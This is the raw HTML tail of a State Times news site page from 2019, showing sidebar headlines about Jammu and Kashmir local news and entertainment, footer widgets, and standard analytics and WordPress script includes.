			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/decks-cleared-for-national-law-university-in-j-guv-assents-to-proposed-bill/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Decks cleared for National Law University in J&K; Guv assents to proposed Bill" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/decks-cleared-for-national-law-university-in-j-guv-assents-to-proposed-bill/">Decks cleared for National Law University in J&#038;K; Guv assents to proposed Bill</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:41:56+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/consultative-workshop-on-forest-environment-wildlife-laws-held/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Consultative Workshop on Forest, Environment & Wildlife Laws held" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/consultative-workshop-on-forest-environment-wildlife-laws-held/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Consultative Workshop on Forest, Environment & Wildlife Laws held" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/consultative-workshop-on-forest-environment-wildlife-laws-held/">Consultative Workshop on Forest, Environment &#038; Wildlife Laws held</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:41:38+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/navratra-festival-devotional-song-competition-enters-day-2-2/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Navratra-Festival-Devotional-Song-Competition-enters-day-Second-01.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Navratra-Festival-Devotional-Song-Competition-enters-day-Second-01.jpg" alt="Navratra Festival: Devotional Song Competition enters day 2" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/navratra-festival-devotional-song-competition-enters-day-2-2/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Navratra-Festival-Devotional-Song-Competition-enters-day-Second-01.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Navratra-Festival-Devotional-Song-Competition-enters-day-Second-01.jpg" alt="Navratra Festival: Devotional Song Competition enters day 2" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/navratra-festival-devotional-song-competition-enters-day-2-2/">Navratra Festival: Devotional Song Competition enters day 2</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:20:21+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/gold-plated-dwar-at-traditional-cave-dedicated-to-pilgrims-after-puja/">Gold-plated Dwar at traditional cave dedicated to pilgrims after Puja</a></li>

			
			<li><a href="http://news.statetimes.in/woman-electrocuted/">Woman electrocuted</a></li>

			
			<li><a href="http://news.statetimes.in/five-gamblers-nabbed-4/">Five gamblers nabbed</a></li>

			
			<li><a href="http://news.statetimes.in/14-kg-explosive-recovered-from-bus-in-jammu-driver-among-three-nabbed/">14 Kg explosive recovered from bus in Jammu; driver among three nabbed</a></li>

			
			<li><a href="http://news.statetimes.in/bsf-jawan-among-two-injured-as-pak-targets-kathua-poonch/">BSF Jawan among two injured as Pak  targets Kathua, Poonch</a></li>

			
			<li><a href="http://news.statetimes.in/rally-on-swachhta-hi-sewa-held/">Rally on &#8216;Swachhta Hi Sewa&#8217; held</a></li>

			
			<li><a href="http://news.statetimes.in/navratra-festival-devotional-song-competition-enters-day-2-2/">Navratra Festival: Devotional Song Competition enters day 2</a></li>

			
			<li><a href="http://news.statetimes.in/conduct-bdc-polls-on-non-party-basis-manjit/">Conduct BDC polls on non-party basis: Manjit</a></li>

			
			<li><a href="http://news.statetimes.in/navratra-festival-day-2-witnesses-series-of-cultural-events/">Navratra Festival: Day 2 witnesses series of cultural events</a></li>

			
			<li><a href="http://news.statetimes.in/lecture-to-motivate-ncc-cadets-to-join-armed-forces-sainik-schools-organised/">Lecture to motivate NCC cadets to join armed forces, Sainik Schools organised</a></li>

			
			<li><a href="http://news.statetimes.in/bootlegger-arrested-145-bottles-of-illicit-liquor-seized/">Bootlegger arrested, 145 bottles of illicit liquor seized</a></li>

			
			<li><a href="http://news.statetimes.in/ngo-holds-awareness-rally/">NGO holds awareness rally</a></li>

			
			<li><a href="http://news.statetimes.in/ncc-cadets-of-gcw-udhampur-attend-thal-sena-camp/">NCC cadets of GCW Udhampur attend Thal Sena Camp</a></li>

			
			<li><a href="http://news.statetimes.in/dont-circulate-any-news-without-verification-police/">Don’t circulate any news without verification: Police</a></li>

			
			<li><a href="http://news.statetimes.in/cleanliness-drive-held-in-handloom-handicraft-centres/">Cleanliness drive held in Handloom, Handicraft centres</a></li>

			
			<li><a href="http://news.statetimes.in/awareness-lecture-on-drug-abuse-held-2/">Awareness lecture on drug abuse held</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/playing-james-bond-has-been-a-wonderful-experience-daniel-craig/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Playing-James-Bond-has-been-a-wonderful-experience-Daniel-Craig.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Playing-James-Bond-has-been-a-wonderful-experience-Daniel-Craig.jpg" alt="Playing James Bond has been a wonderful experience: Daniel Craig" width="265" height="168">			  <p class="slide-caption">Playing James Bond has been a wonderful experience: Daniel Craig</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/lata-mangeshkar-makes-instagram-debut/"><img src="http://news.statetimes.in/wp-content/uploads/2016/09/Lata-Mangeshkar-gives-blessings-to-Asha-Bhosle-on-birthday.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/09/Lata-Mangeshkar-gives-blessings-to-Asha-Bhosle-on-birthday.jpg" alt="Lata Mangeshkar makes Instagram debut" width="265" height="168">			  <p class="slide-caption">Lata Mangeshkar makes Instagram debut</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/aim-to-entertain-with-story-relevant-in-todays-times-john-on-satyameva-jayate-2/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Aim-to-entertain-with-story-relevant-in-todays-times-John-on-Satyameva-Jayate-2.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Aim-to-entertain-with-story-relevant-in-todays-times-John-on-Satyameva-Jayate-2.jpg" alt="Aim to entertain with story relevant in today's times: John on 'Satyameva Jayate 2'" width="265" height="168">			  <p class="slide-caption">Aim to entertain with story relevant in today&#8217;s times: John on &#8216;Satyameva Jayate 2&#8217;</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/life-for-me-is-about-fears-mashed-with-excitement-hrithik-roshan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/01/Hrithik-Roshan-faces-injury-during-Mohenjo-Daro-shoot.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/01/Hrithik-Roshan-faces-injury-during-Mohenjo-Daro-shoot.jpg" alt="Life for me is about fears mashed with excitement: Hrithik Roshan" width="265" height="168">			  <p class="slide-caption">Life for me is about fears mashed with excitement: Hrithik Roshan</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/no-one-better-than-dhoni-to-decide-on-retirement-says-sushant-singh-rajput/"><img src="http://news.statetimes.in/wp-content/uploads/2019/09/No-one-better-than-Dhoni-to-decide-on-retirement-says-Sushant-Singh-Rajput.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/09/No-one-better-than-Dhoni-to-decide-on-retirement-says-Sushant-Singh-Rajput.jpg" alt="No one better than Dhoni to decide on retirement, says Sushant Singh Rajput" width="265" height="168">			  <p class="slide-caption">No one better than Dhoni to decide on retirement, says Sushant Singh Rajput</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1483</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href=""  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>0</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">thietbicuuhoa.com</a> <time>on 15 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/">CISF seizes 5 gold bars at Hyderabad Airport</a></span></h4>
                                    <p>I have read so many articles or reviews on the topic of the blogger ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">scr888 judi</a> <time>on 02 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/">Gold prices extend slide on lacklustre demand</a></span></h4>
                                    <p>With the desire comes having of invention. Even you feel hurt when he ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"6211675257","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2019-10-02 12:48:20 by W3 Total Cache
-->